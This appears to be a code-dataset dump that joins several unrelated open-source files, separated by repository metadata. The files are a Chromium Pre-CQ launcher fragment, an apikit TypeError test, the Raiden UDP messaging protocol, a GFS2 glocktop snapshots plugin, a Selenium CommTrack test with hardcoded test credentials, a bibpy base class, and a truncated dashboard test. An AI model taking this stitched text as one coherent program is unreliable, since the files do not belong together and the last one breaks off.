self.inflight[change] = datetime.datetime.now()
elif self._HasInflightTimedOut(change):
msg = ('The pre-cq trybot for your change timed out after %s minutes.'
'\n\n'
'This problem can happen if your change causes the builder '
'to hang, or if there is some infrastructure issue. If your '
'change is not at fault you may mark your change as ready '
'again. If this problem occurs multiple times please notify '
'the sheriff and file a bug.' % self.INFLIGHT_DELAY)
pool.SendNotification(change, '%(details)s', details=msg)
pool.RemoveCommitReady(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_FAILED,
self._run.options.debug)
elif status == self.STATUS_FAILED:
# The Pre-CQ run failed for this change. It's possible that we got
# unlucky and this change was just marked as 'Not Ready' by a bot. To
# test this, mark the CL as 'waiting' for now. If the CL is still marked
# as 'Ready' next time we check, we'll know the CL is truly still ready.
busy.add(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_WAITING,
self._run.options.debug)
self._PrintPatchStatus(change, 'failed')
elif status == self.STATUS_PASSED:
passed.add(change)
self._PrintPatchStatus(change, 'passed')
return busy, passed
def LaunchTrybot(self, pool, plan):
"""Launch a Pre-CQ run with the provided list of CLs.
Args:
pool: ValidationPool corresponding to |plan|.
plan: The list of patches to test in the Pre-CQ run.
"""
cmd = ['cbuildbot', '--remote', constants.PRE_CQ_BUILDER_NAME]
if self._run.options.debug:
cmd.append('--debug')
for patch in plan:
cmd += ['-g', cros_patch.AddPrefix(patch, patch.gerrit_number)]
self._PrintPatchStatus(patch, 'testing')
cros_build_lib.RunCommand(cmd, cwd=self._build_root)
for patch in plan:
if pool.GetCLStatus(PRE_CQ, patch) != self.STATUS_PASSED:
pool.UpdateCLStatus(PRE_CQ, patch, self.STATUS_LAUNCHING,
self._run.options.debug)
def GetDisjointTransactionsToTest(self, pool, changes):
"""Get the list of disjoint transactions to test.
Side effect: reject or retry changes that have timed out.
Returns:
A list of disjoint transactions to test. Each transaction should be sent
to a different Pre-CQ trybot.
"""
busy, passed = self.GetPreCQStatus(pool, changes)
# Create a list of disjoint transactions to test.
manifest = git.ManifestCheckout.Cached(self._build_root)
plans = pool.CreateDisjointTransactions(
manifest, max_txn_length=self.MAX_PATCHES_PER_TRYBOT_RUN)
for plan in plans:
# If any of the CLs in the plan are currently "busy" being tested,
# wait until they're done before launching our trybot run. This helps
# avoid race conditions.
#
# Similarly, if all of the CLs in the plan have already been validated,
# there's no need to launch a trybot run.
plan = set(plan)
if plan.issubset(passed):
logging.info('CLs already verified: %r', ' '.join(map(str, plan)))
elif plan.intersection(busy):
logging.info('CLs currently being verified: %r',
' '.join(map(str, plan.intersection(busy))))
if plan.difference(busy):
logging.info('CLs waiting on verification of dependencies: %r',
' '.join(map(str, plan.difference(busy))))
else:
yield plan
def ProcessChanges(self, pool, changes, _non_manifest_changes):
"""Process a list of changes that were marked as Ready.
From our list of changes that were marked as Ready, we create a
list of disjoint transactions and send each one to a separate Pre-CQ
trybot.
Non-manifest changes are just submitted here because they don't need to be
verified by either the Pre-CQ or CQ.
"""
# Submit non-manifest changes if we can.
if tree_status.IsTreeOpen():
pool.SubmitNonManifestChanges(check_tree_open=False)
# Launch trybots for manifest changes.
for plan in self.GetDisjointTransactionsToTest(pool, changes):
self.LaunchTrybot(pool, plan)
# Tell ValidationPool to keep waiting for more changes until we hit
# its internal timeout.
return [], []
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
# Setup and initialize the repo.
super(PreCQLauncherStage, self).PerformStage()
# Loop through all of the changes until we hit a timeout.
validation_pool.ValidationPool.AcquirePool(
self._run.config.overlays, self.repo,
self._run.buildnumber,
constants.PRE_CQ_LAUNCHER_NAME,
dryrun=self._run.options.debug,
changes_query=self._run.options.cq_gerrit_override,
check_tree_open=False, change_filter=self.ProcessChanges,
metadata=self._run.attrs.metadata)
|
bsd-3-clause
| -4,545,775,359,455,105,000 | 38.317003 | 80 | 0.684405 | false |
lsst-sqre/sqre-apikit
|
tests/test_lsstflask_type_errors.py
|
1
|
1993
|
#!/usr/bin/env python
"""Test APIFlask class for input parameters causing TypeErrors.
"""
import apikit
import pytest
def test_lsstflask_type_errors():
"""Test APIFlask for input parameters causing TypeErrors.
"""
# No arguments at all.
# Obviously the linter is correct here...
with pytest.raises(TypeError):
# pylint: disable=no-value-for-parameter
apikit.APIFlask()
# Name is not a string
with pytest.raises(TypeError):
apikit.APIFlask(("Beer", "me"), "2.0", "http://example.repo",
"BobApp")
# Version is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", 2.0, "http://example.repo", "BobApp")
# Repository is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", 2.0, ["repo", "man"], "BobApp")
# Description is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", 2.0, "", "http://example.repo",
{"totally": "bogus"})
# Auth is not None, the empty string or "none", or a dict
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo",
"BobApp", auth=5)
# Auth is not None, the empty string or "none", or a dict
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
auth="bob")
# Api_version is not a string
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
api_version=5, auth="")
# Route is not None, a string, or a list of strings
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
route=2)
# Route is a list that contains a non-string
with pytest.raises(TypeError):
apikit.APIFlask("bob", "2.0", "http://example.repo", "BobApp",
route=[2])
|
mit
| -3,355,852,424,482,573,300 | 39.673469 | 70 | 0.582037 | false |
tomashaber/raiden
|
raiden/network/protocol.py
|
1
|
24753
|
# -*- coding: utf-8 -*-
import logging
import random
from collections import (
namedtuple,
defaultdict,
)
from itertools import repeat
import cachetools
import gevent
from gevent.event import (
_AbstractLinkable,
AsyncResult,
Event,
)
from ethereum import slogging
from raiden.exceptions import (
InvalidAddress,
InvalidLocksRoot,
InvalidNonce,
TransferWhenClosed,
TransferUnwanted,
UnknownAddress,
UnknownTokenAddress,
)
from raiden.constants import (
UDP_MAX_MESSAGE_SIZE,
)
from raiden.settings import (
CACHE_TTL,
)
from raiden.messages import decode, Ack, Ping, SignedMessage
from raiden.utils import isaddress, sha3, pex
from raiden.utils.notifying_queue import NotifyingQueue
log = slogging.get_logger(__name__) # pylint: disable=invalid-name
ping_log = slogging.get_logger(__name__ + '.ping') # pylint: disable=invalid-name
# - async_result available for code that wants to block on message acknowledgment
# - receiver_address used to tie back the echohash to the receiver (mainly for
# logging purposes)
SentMessageState = namedtuple('SentMessageState', (
'async_result',
'receiver_address',
))
HealthEvents = namedtuple('HealthEvents', (
'event_healthy',
'event_unhealthy',
))
NODE_NETWORK_UNKNOWN = 'unknown'
NODE_NETWORK_UNREACHABLE = 'unreachable'
NODE_NETWORK_REACHABLE = 'reachable'
# GOALS:
# - Each netting channel must have the messages processed in-order, the
# protocol must detect unacknowledged messages and retry them.
# - A queue must not stall because of synchronization problems in other queues.
# - Assuming a queue can stall, the unhealthiness of a node must not be
# inferred from the lack of acknowledgement from a single queue, but healthiness
# may be safely inferred from it.
# - The state of the node must be synchronized among all tasks that are
# handling messages.
def event_first_of(*events):
""" Waits until one of `events` is set.
The event returned is /not/ cleared with any of the `events`, this value
must not be reused if the clearing behavior is used.
"""
first_finished = Event()
if not all(isinstance(e, _AbstractLinkable) for e in events):
raise ValueError('all events must be linkable')
for event in events:
event.rawlink(lambda _: first_finished.set())
return first_finished
def timeout_exponential_backoff(retries, timeout, maximum):
""" Timeouts generator with an exponential backoff strategy.
Timeouts start spaced by `timeout`, after `retries` exponentially increase
the retry delays until `maximum`, then maximum is returned indefinitely.
"""
yield timeout
tries = 1
while tries < retries:
tries += 1
yield timeout
while timeout < maximum:
timeout = min(timeout * 2, maximum)
yield timeout
while True:
yield maximum
def retry(protocol, data, receiver_address, event_stop, timeout_backoff):
""" Send data until it's acknowledged.
Exits when the first of the following happen:
- The packet is acknowledged.
- Event_stop is set.
- The iterator timeout_backoff runs out of values.
Returns:
bool: True if the message was acknowledged, False otherwise.
"""
async_result = protocol.send_raw_with_result(
data,
receiver_address,
)
event_quit = event_first_of(
async_result,
event_stop,
)
for timeout in timeout_backoff:
if event_quit.wait(timeout=timeout) is True:
break
protocol.send_raw_with_result(
data,
receiver_address,
)
return async_result.ready()
def wait_recovery(event_stop, event_healthy):
event_first_of(
event_stop,
event_healthy,
).wait()
if event_stop.is_set():
return
# There may be multiple threads waiting, do not restart them all at
# once to avoid message flood.
gevent.sleep(random.random())
def retry_with_recovery(
protocol,
data,
receiver_address,
event_stop,
event_healthy,
event_unhealthy,
backoff):
""" Send data while the node is healthy until it's acknowledged.
Note:
backoff must be an infinite iterator, otherwise this task will
become a hot loop.
"""
# The underlying unhealthy will be cleared, care must be taken to properly
# clear stop_or_unhealthy too.
stop_or_unhealthy = event_first_of(
event_stop,
event_unhealthy,
)
acknowledged = False
while not event_stop.is_set() and not acknowledged:
# Packets must not be sent to an unhealthy node, nor should the task
# wait for it to become available if the message has been acknowledged.
if event_unhealthy.is_set():
wait_recovery(
event_stop,
event_healthy,
)
# Assume wait_recovery returned because unhealthy was cleared and
# continue execution, this is safe to do because event_stop is
# checked below.
stop_or_unhealthy.clear()
if event_stop.is_set():
return
acknowledged = retry(
protocol,
data,
receiver_address,
# retry will stop when this event is set, allowing this task to
# wait for recovery when the node becomes unhealthy or to quit if
# the stop event is set.
stop_or_unhealthy,
# Intentionally reusing backoff to restart from the last
# timeout/number of iterations.
backoff,
)
return acknowledged
def single_queue_send(
protocol,
receiver_address,
queue,
event_stop,
event_healthy,
event_unhealthy,
message_retries,
message_retry_timeout,
message_retry_max_timeout):
""" Handles a single message queue for `receiver_address`.
Notes:
- This task must be the only consumer of queue.
- This task can be killed at any time, but the intended usage is to stop it
with the event_stop.
- If there are many queues for the same receiver_address, it is the
caller's responsibility to not start them together to avoid congestion.
- This task assumes the endpoint is never cleared after it's first known.
If this assumption changes the code must be updated to handle unknown
addresses.
"""
# A NotifyingQueue is required to implement cancelability, otherwise the
# task cannot be stoped while the greenlet waits for an element to be
# inserted in the queue.
if not isinstance(queue, NotifyingQueue):
raise ValueError('queue must be a NotifyingQueue.')
# Reusing the event, clear must be carefully done
data_or_stop = event_first_of(
queue,
event_stop,
)
# Wait for the endpoint registration or to quit
event_first_of(
event_healthy,
event_stop,
).wait()
while True:
data_or_stop.wait()
if event_stop.is_set():
return
# The queue is not empty at this point, so this won't raise Empty.
# This task being the only consumer is a requirement.
data = queue.peek(block=False)
backoff = timeout_exponential_backoff(
message_retries,
message_retry_timeout,
message_retry_max_timeout,
)
acknowledged = retry_with_recovery(
protocol,
data,
receiver_address,
event_stop,
event_healthy,
event_unhealthy,
backoff,
)
if acknowledged:
queue.get()
# Checking the length of the queue does not trigger a
# context-switch, so it's safe to assume the length of the queue
# won't change under our feet and when a new item will be added the
# event will be set again.
if not queue:
data_or_stop.clear()
if event_stop.is_set():
return
def healthcheck(
protocol,
receiver_address,
event_stop,
event_healthy,
event_unhealthy,
nat_keepalive_retries,
nat_keepalive_timeout,
nat_invitation_timeout,
ping_nonce):
""" Sends a periodical Ping to `receiver_address` to check its health. """
# The state of the node is unknown, the events are set to allow the tasks
# to do work.
protocol.set_node_network_state(
receiver_address,
NODE_NETWORK_UNKNOWN,
)
# Always call `clear` before `set`, since only `set` does context-switches
# it's easier to reason about tasks that are waiting on both events.
# Wait for the end-point registration or for the node to quit
try:
protocol.get_host_port(receiver_address)
except UnknownAddress:
event_healthy.clear()
event_unhealthy.set()
backoff = timeout_exponential_backoff(
nat_keepalive_retries,
nat_keepalive_timeout,
nat_invitation_timeout,
)
sleep = next(backoff)
while not event_stop.wait(sleep):
try:
protocol.get_host_port(receiver_address)
except UnknownAddress:
sleep = next(backoff)
else:
break
# Don't wait to send the first Ping and to start sending messages if the
# endpoint is known
sleep = 0
event_unhealthy.clear()
event_healthy.set()
while not event_stop.wait(sleep):
sleep = nat_keepalive_timeout
ping_nonce['nonce'] += 1
data = protocol.get_ping(
ping_nonce['nonce'],
)
# Send Ping a few times before setting the node as unreachable
acknowledged = retry(
protocol,
data,
receiver_address,
event_stop,
[nat_keepalive_timeout] * nat_keepalive_retries,
)
if event_stop.is_set():
return
if not acknowledged:
# The node is not healthy, clear the event to stop all queue
# tasks
protocol.set_node_network_state(
receiver_address,
NODE_NETWORK_UNREACHABLE,
)
event_healthy.clear()
event_unhealthy.set()
# Retry until recovery, used for:
# - Checking node status.
# - Nat punching.
acknowledged = retry(
protocol,
data,
receiver_address,
event_stop,
repeat(nat_invitation_timeout),
)
if acknowledged:
event_unhealthy.clear()
event_healthy.set()
protocol.set_node_network_state(
receiver_address,
NODE_NETWORK_REACHABLE,
)
class RaidenProtocol(object):
""" Encode the message into a packet and send it.
Each message received is stored by hash and if it is received twice the
previous answer is resent.
Repeat sending messages until an acknowledgment is received or the maximum
number of retries is hit.
"""
def __init__(
self,
transport,
discovery,
raiden,
retry_interval,
retries_before_backoff,
nat_keepalive_retries,
nat_keepalive_timeout,
nat_invitation_timeout):
self.transport = transport
self.discovery = discovery
self.raiden = raiden
self.retry_interval = retry_interval
self.retries_before_backoff = retries_before_backoff
self.nat_keepalive_retries = nat_keepalive_retries
self.nat_keepalive_timeout = nat_keepalive_timeout
self.nat_invitation_timeout = nat_invitation_timeout
self.event_stop = Event()
self.channel_queue = dict() # TODO: Change keys to the channel address
self.greenlets = list()
self.addresses_events = dict()
self.nodeaddresses_networkstatuses = defaultdict(lambda: NODE_NETWORK_UNKNOWN)
# Maps the echohash of received and *sucessfully* processed messages to
# its Ack, used to ignored duplicate messages and resend the Ack.
self.receivedhashes_to_acks = dict()
# Maps the echohash to a SentMessageState
self.senthashes_to_states = dict()
# Maps the addresses to a dict with the latest nonce (using a dict
# because python integers are immutable)
self.nodeaddresses_to_nonces = dict()
cache = cachetools.TTLCache(
maxsize=50,
ttl=CACHE_TTL,
)
cache_wrapper = cachetools.cached(cache=cache)
self.get_host_port = cache_wrapper(discovery.get)
def start(self):
self.transport.start()
def stop_and_wait(self):
# Stop handling incoming packets, but don't close the socket. The
# socket can only be safely closed after all outgoing tasks are stopped
self.transport.stop_accepting()
# Stop processing the outgoing queues
self.event_stop.set()
gevent.wait(self.greenlets)
# All outgoing tasks are stopped. Now it's safe to close the socket. At
# this point there might be some incoming message being processed,
# keeping the socket open is not useful for these.
self.transport.stop()
# Set all the pending results to False
for waitack in self.senthashes_to_states.itervalues():
waitack.async_result.set(False)
def get_health_events(self, receiver_address):
""" Starts a healthcheck taks for `receiver_address` and returns a
HealthEvents with locks to react on its current state.
"""
if receiver_address not in self.addresses_events:
self.start_health_check(receiver_address)
return self.addresses_events[receiver_address]
def start_health_check(self, receiver_address):
""" Starts a task for healthchecking `receiver_address` if there is not
one yet.
"""
if receiver_address not in self.addresses_events:
ping_nonce = self.nodeaddresses_to_nonces.setdefault(
receiver_address,
{'nonce': 0}, # HACK: Allows the task to mutate the object
)
events = HealthEvents(
event_healthy=Event(),
event_unhealthy=Event(),
)
self.addresses_events[receiver_address] = events
self.greenlets.append(gevent.spawn(
healthcheck,
self,
receiver_address,
self.event_stop,
events.event_healthy,
events.event_unhealthy,
self.nat_keepalive_retries,
self.nat_keepalive_timeout,
self.nat_invitation_timeout,
ping_nonce,
))
def get_channel_queue(self, receiver_address, token_address):
key = (
receiver_address,
token_address,
)
if key in self.channel_queue:
return self.channel_queue[key]
queue = NotifyingQueue()
self.channel_queue[key] = queue
events = self.get_health_events(receiver_address)
self.greenlets.append(gevent.spawn(
single_queue_send,
self,
receiver_address,
queue,
self.event_stop,
events.event_healthy,
events.event_unhealthy,
self.retries_before_backoff,
self.retry_interval,
self.retry_interval * 10,
))
if log.isEnabledFor(logging.DEBUG):
log.debug(
'new queue created for',
node=pex(self.raiden.address),
token=pex(token_address),
to=pex(receiver_address),
)
return queue
def send_async(self, receiver_address, message):
if not isaddress(receiver_address):
raise ValueError('Invalid address {}'.format(pex(receiver_address)))
if isinstance(message, (Ack, Ping)):
raise ValueError('Do not use send for Ack or Ping messages')
# Messages that are not unique per receiver can result in hash
# collision, e.g. Secret messages. The hash collision has the undesired
# effect of aborting message resubmission once /one/ of the nodes
# replied with an Ack, adding the receiver address into the echohash to
# avoid these collisions.
messagedata = message.encode()
echohash = sha3(messagedata + receiver_address)
if len(messagedata) > UDP_MAX_MESSAGE_SIZE:
raise ValueError(
'message size exceeds the maximum {}'.format(UDP_MAX_MESSAGE_SIZE)
)
# All messages must be ordered, but only on a per channel basis.
token_address = getattr(message, 'token', '')
# Ignore duplicated messages
if echohash not in self.senthashes_to_states:
async_result = AsyncResult()
self.senthashes_to_states[echohash] = SentMessageState(
async_result,
receiver_address,
)
queue = self.get_channel_queue(
receiver_address,
token_address,
)
if log.isEnabledFor(logging.DEBUG):
log.debug(
'SENDING MESSAGE',
to=pex(receiver_address),
node=pex(self.raiden.address),
message=message,
echohash=pex(echohash),
)
queue.put(messagedata)
else:
waitack = self.senthashes_to_states[echohash]
async_result = waitack.async_result
return async_result
def send_and_wait(self, receiver_address, message, timeout=None):
"""Sends a message and wait for the response ack."""
async_result = self.send_async(receiver_address, message)
return async_result.wait(timeout=timeout)
def maybe_send_ack(self, receiver_address, ack_message):
""" Send ack_message to receiver_address if the transport is running. """
if not isaddress(receiver_address):
raise ValueError('Invalid address {}'.format(pex(receiver_address)))
if not isinstance(ack_message, Ack):
raise ValueError('Use maybe_send_ack only for Ack messages')
messagedata = ack_message.encode()
self.receivedhashes_to_acks[ack_message.echo] = (receiver_address, messagedata)
self._maybe_send_ack(*self.receivedhashes_to_acks[ack_message.echo])
def _maybe_send_ack(self, receiver_address, messagedata):
""" ACK must not go into the queue, otherwise nodes will deadlock
waiting for the confirmation.
"""
host_port = self.get_host_port(receiver_address)
# ACKs are sent at the end of the receive method, after the message is
# sucessfully processed. It may be the case that the server is stopped
# after the message is received but before the ack is sent, under that
# circumstance the udp socket would be unavaiable and then an exception
# is raised.
#
# This check verifies the udp socket is still available before trying
# to send the ack. There must be *no context-switches after this test*.
if self.transport.server.started:
self.transport.send(
self.raiden,
host_port,
messagedata,
)
def get_ping(self, nonce):
""" Returns a signed Ping message.
Note: Ping messages don't have an enforced ordering, so a Ping message
with a higher nonce may be acknowledged first.
"""
message = Ping(nonce)
self.raiden.sign(message)
message_data = message.encode()
return message_data
def send_raw_with_result(self, data, receiver_address):
""" Sends data to receiver_address and returns an AsyncResult that will
be set once the message is acknowledged.
Always returns same AsyncResult instance for equal input.
"""
host_port = self.get_host_port(receiver_address)
echohash = sha3(data + receiver_address)
if echohash not in self.senthashes_to_states:
async_result = AsyncResult()
self.senthashes_to_states[echohash] = SentMessageState(
async_result,
receiver_address,
)
else:
async_result = self.senthashes_to_states[echohash].async_result
if not async_result.ready():
self.transport.send(
self.raiden,
host_port,
data,
)
return async_result
def set_node_network_state(self, node_address, node_state):
self.nodeaddresses_networkstatuses[node_address] = node_state
def receive(self, data):
if len(data) > UDP_MAX_MESSAGE_SIZE:
log.error('receive packet larger than maximum size', length=len(data))
return
# Repeat the ACK if the message has been handled before
echohash = sha3(data + self.raiden.address)
if echohash in self.receivedhashes_to_acks:
return self._maybe_send_ack(*self.receivedhashes_to_acks[echohash])
message = decode(data)
if isinstance(message, Ack):
waitack = self.senthashes_to_states.get(message.echo)
if waitack is None:
if log.isEnabledFor(logging.DEBUG):
log.debug(
'ACK FOR UNKNOWN ECHO',
node=pex(self.raiden.address),
echohash=pex(message.echo),
)
else:
if log.isEnabledFor(logging.DEBUG):
log.debug(
'ACK RECEIVED',
node=pex(self.raiden.address),
receiver=pex(waitack.receiver_address),
echohash=pex(message.echo),
)
waitack.async_result.set(True)
elif isinstance(message, Ping):
if ping_log.isEnabledFor(logging.DEBUG):
ping_log.debug(
'PING RECEIVED',
node=pex(self.raiden.address),
echohash=pex(echohash),
message=message,
sender=pex(message.sender),
)
ack = Ack(
self.raiden.address,
echohash,
)
self.maybe_send_ack(
message.sender,
ack,
)
elif isinstance(message, SignedMessage):
if log.isEnabledFor(logging.INFO):
log.info(
'MESSAGE RECEIVED',
node=pex(self.raiden.address),
echohash=pex(echohash),
message=message,
message_sender=pex(message.sender)
)
try:
self.raiden.on_message(message, echohash)
# only send the Ack if the message was handled without exceptions
ack = Ack(
self.raiden.address,
echohash,
)
try:
if log.isEnabledFor(logging.DEBUG):
log.debug(
'SENDING ACK',
node=pex(self.raiden.address),
to=pex(message.sender),
echohash=pex(echohash),
)
self.maybe_send_ack(
message.sender,
ack,
)
except (InvalidAddress, UnknownAddress) as e:
log.debug("Couldn't send the ACK", e=e)
except (UnknownAddress, InvalidNonce, TransferWhenClosed, TransferUnwanted) as e:
log.DEV('maybe unwanted transfer', e=e)
except (UnknownTokenAddress, InvalidLocksRoot) as e:
if log.isEnabledFor(logging.WARN):
log.warn(str(e))
elif log.isEnabledFor(logging.ERROR):
log.error(
'Invalid message',
message=data.encode('hex'),
)
|
mit
| 2,086,037,826,785,422,800 | 30.572704 | 93 | 0.584899 | false |
sbradley7777/glocktop_analyze
|
glocktop_analyze/plugins/snapshots.py
|
1
|
5213
|
#!/usr/bin/python
"""
@author : Shane Bradley
@contact : sbradley@redhat.com
@copyright : GPLv3
* This plugin outputs the number of snapshots taken for a filesystem, the start
time, and end time or last snapshot taken.
* This plugin outputs the filesystem name, time when snapshot taken when dlm
activity is greater than zero.
"""
import logging
import logging.handlers
import os.path
import glocktop_analyze
from glocktop_analyze.plugins import Plugin
from glocktop_analyze.utilities import ColorizeConsoleText, write_to_file, tableize
from glocktop_analyze.html import generate_css_header, generate_table
from glocktop_analyze.html import generate_footer
class Snapshots(Plugin):
def __init__(self, snapshots, path_to_output_dir, options):
Plugin.__init__(self, "snapshots",
"The stats for the snapshots and dlm activity.",
snapshots, "Snapshot Stats", path_to_output_dir,
options)
self.__start_time = self.get_snapshots_start_time()
self.__stop_time = self.get_snapshots_end_time()
self.__snapshot_count = 0
self.__dlm_activity = []
def __get_text(self, colorize=False):
summary = ""
if (self.get_snapshots()):
snapshots_summary = tableize([[self.get_hostname(), self.get_filesystem_name(),
str(self.__snapshot_count), self.__start_time,
self.__stop_time]],
["Hostname", "Filesystem", "Snapshots",
"Start Time", "Stop Time"], colorize=colorize).strip()
if (snapshots_summary):
summary += "\nThen number of snapshots taken, start time, and end time.\n%s\n" %(snapshots_summary)
if (self.__dlm_activity):
dlm_activity_summary = tableize(self.__dlm_activity, ["Hostname", "Filesystem",
"Snapshot Time",
"Number of DLM Waiters"],
colorize=colorize).strip()
if (dlm_activity_summary):
summary += "\nThe snapshots that contained at least 1 DLM waiter.\n%s\n" %(dlm_activity_summary)
if (summary):
return "%s: %s\n%s\n" %(self.get_title(), self.get_description(), summary)
return ""
def analyze(self):
for snapshot in self.get_snapshots():
self.__snapshot_count += 1
dlm_activity = snapshot.get_dlm_activity()
if (not dlm_activity == None):
self.__dlm_activity.append([self.get_hostname(), self.get_filesystem_name(), snapshot.get_date_time(), dlm_activity.get_waiter_count()])
def console(self):
summary = self.__get_text(colorize=True)
if (summary):
print "%s\n" %(summary.rstrip())
def write(self, html_format=False):
wdata =""
path_to_output_file = ""
if (not html_format):
filename = "%s.txt" %(self.get_title().lower().replace(" - ", "-").replace(" ", "_"))
path_to_output_file = os.path.join(os.path.join(self.get_path_to_output_dir(),
self.get_filesystem_name()), filename)
wdata = self.__get_text(colorize=False)
else:
bdata = ""
if (self.__snapshot_count > 0):
bdata += generate_table([[self.get_hostname(), self.get_filesystem_name(), str(self.__snapshot_count),
self.__start_time, self.__stop_time]],
["Hostname", "Filesystem", "Snapshots", "Start Time", "Stop Time"],
title="Snapshots Taken",
description="The number of snapshots taken and the time that first and the last snapshot taken.")
if (self.__dlm_activity):
bdata += generate_table(self.__dlm_activity,
["Hostname", "Filesystem", "Snapshot Time", "Number of DLM Waiters"],
title="DLM Waiter Count",
description="The number of DLM waiters for a snapshot. Only snapshots with DLM waiter count higher than 0 displayed.")
if (bdata):
wdata = "%s\n%s\n%s" %(generate_css_header(include_css_table=True), bdata, generate_footer())
filename = "%s.html" %(self.get_title().lower().replace(" - ", "-").replace(" ", "_"))
path_to_output_file = os.path.join(os.path.join(self.get_path_to_output_dir(),
self.get_filesystem_name()), filename)
if (wdata):
if (not write_to_file(path_to_output_file, wdata, append_to_file=False, create_file=True)):
message = "An error occurred writing to the file: %s" %(path_to_output_file)
logging.getLogger(glocktop_analyze.MAIN_LOGGER_NAME).debug(message)
|
gpl-3.0
| -5,534,080,927,086,368,000 | 51.656566 | 158 | 0.532707 | false |
commtrack/commtrack-old-to-del
|
tests/deployment/selenium/hq_test.py
|
1
|
3617
|
from selenium import selenium
import unittest, time, re, urllib2
from post import *
import os
import sys
import time
class testingPost(unittest.TestCase):
def setUp(self):
self.verificationErrors = []
self.selenium = selenium("localhost", 4444, "*firefox", server)
self.selenium.start()
def test_testingPost(self):
sel = self.selenium
sel.open("/no_permissions?next=/")
sel.click("link=Log in to CommTrack")
sel.wait_for_page_to_load("30000")
sel.type("id_username", user)
sel.type("id_password", passw)
sel.click("//input[@value='Login']")
# testing creation of xform
sel.wait_for_page_to_load("30000")
sel.click("link=XForms")
time.sleep(3)
if sel.is_text_present("Sample Form 1"):
self.delete_xform(sel)
time.sleep(3)
path = os.path.join(sys.path[0], "sample_form.xhtml")
sel.type("id_file", path)
sel.type("id_form_display_name", "Sample Form 1")
sel.click("//div[@id='xform-register-block']/form/ul/li[3]/input")
sel.wait_for_page_to_load("30000")
sel.click("//input[@value=\"Yes, I'm sure\"]")
sel.wait_for_page_to_load("30000")
try: self.failUnless(sel.is_text_present("Sample Form 1"))
except AssertionError, e: self.verificationErrors.append(str(e))
# testing basic submission of xml (or file) and diff against actual
# copy
submission_number = post(serverhost, domain)
sel.click("link=Submissions")
sel.wait_for_page_to_load("30000")
time.sleep(3)
sel.click("link=%s" % submission_number)
sel.wait_for_page_to_load("30000")
time.sleep(2)
sel.click("link=view full raw submission")
time.sleep(2)
try:
file = open('testupload.xml', 'r')
xml_present = file.read()
self.failUnless(sel.is_text_present(xml_present))
except AssertionError, e: self.verificationErrors.append(str(e))
#test to see if form has been processed
sel.open("/receiver/review")
sel.wait_for_page_to_load("30000")
time.sleep(3)
sel.click("link=%s" % submission_number)
sel.wait_for_page_to_load("30000")
try: self.failUnless(sel.is_text_present("view form data"))
except AssertionError, e: self.verificationErrors.append(str(e))
#test Xform deletion
self.delete_xform(sel)
def tearDown(self):
self.selenium.stop()
self.assertEqual([], self.verificationErrors)
def delete_xform(self, sel):
sel.open("/xforms/")
sel.wait_for_page_to_load("30000")
sel.click("//div[@onclick=\"show_forms('http://dev.commcarehq.org/BRAC/CHP/coakley', '#formlist');\"]")
sel.click("//div[@onclick=\"show_forms('http://dev.commcarehq.org/BRAC/CHP/coakley', '#formlist');\"]")
time.sleep(2)
sel.click("link=drop this form")
sel.wait_for_page_to_load("30000")
sel.click("//input[@value=\"Yes, I'm sure\"]")
sel.wait_for_page_to_load("30000")
try: self.failUnless(not sel.is_text_present("Sample Form 1"))
except AssertionError, e: self.verificationErrors.append(str(e))
sites = {"http://staging.commcarehq.org": ["brian", "test",
"staging.commcarehq.org", "BRAC"]}
if __name__ == "__main__":
for key, value in sites.items():
server = key
user = value[0]
passw = value[1]
serverhost = value[2]
domain = value[3]
unittest.main()
|
bsd-3-clause
| -2,440,084,986,140,611,000 | 35.908163 | 111 | 0.594968 | false |
MisanthropicBit/bibpy
|
bibpy/entry/base.py
|
1
|
1986
|
# -*- coding: utf-8 -*-
"""Base class for all types of entries."""
class BaseEntry:
"""Base class for all types of entries."""
def format(self, **options):
raise NotImplementedError()
def format_auxiliary_entry(self, entry_type, contents, indent=' ',
singleline=True, braces=True):
"""Common formatting for @comment, @string and @preamble entries.
If singleline is True, put the entry on a single line. The contents of
the entry is indented by the indent argument if singleline is True.
If braces is True, surround the entry by braces, else parentheses.
"""
return '@{0}{1}{2}{3}{4}{5}'.format(
entry_type,
'{' if braces else '(',
'' if singleline else '\n' + indent,
contents,
'' if singleline else '\n',
'}' if braces else ')'
)
@property
def bibtype(self):
raise NotImplementedError()
@property
def bibkey(self):
raise NotImplementedError()
@property
def fields(self):
raise NotImplementedError()
def aliases(self, format):
raise NotImplementedError()
def valid(self, format):
raise NotImplementedError()
def keys(self):
raise NotImplementedError()
def values(self):
raise NotImplementedError()
def __eq__(self, other):
raise NotImplementedError()
def __ne__(self, other):
return not self == other
def __contains__(self, item):
raise NotImplementedError()
def __getitem__(self, field):
"""Return the value for the given field."""
raise NotImplementedError()
def __iter__(self):
for field in self.fields:
yield (field, self[field])
def __len__(self):
raise NotImplementedError()
def __str__(self):
return self.format()
def __repr__(self):
raise NotImplementedError()
|
mit
| 4,408,465,947,743,820,300 | 24.139241 | 78 | 0.572508 | false |
SummerLW/Perf-Insight-Report
|
dashboard/dashboard/task_runner_test.py
|
1
|
1415
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import mock
from dashboard import task_runner
from dashboard import testing_common
class TaskRunnerTest(testing_common.TestCase):
def setUp(self):
super(TaskRunnerTest, self).setUp()
def _GetMockCallArg(self, function_mock, call_index):
"""Gets the first argument value for call at "call_index".
Args:
function_mock: A Mock object.
call_index: The index at which the mocked function was called.
Returns:
The first argument value.
"""
# See http://www.voidspace.org.uk/python/mock/helpers.html#call and
# http://www.voidspace.org.uk/python/mock/mock.html#mock.Mock.call_args_list
call_args_list = function_mock.call_args_list
if not call_args_list or len(call_args_list) <= call_index:
return None
args, _ = call_args_list[call_index]
return args[0]
@mock.patch.object(task_runner, '_AddReportToLog')
def testRun(self, add_report_to_log_mock):
def SampleTask():
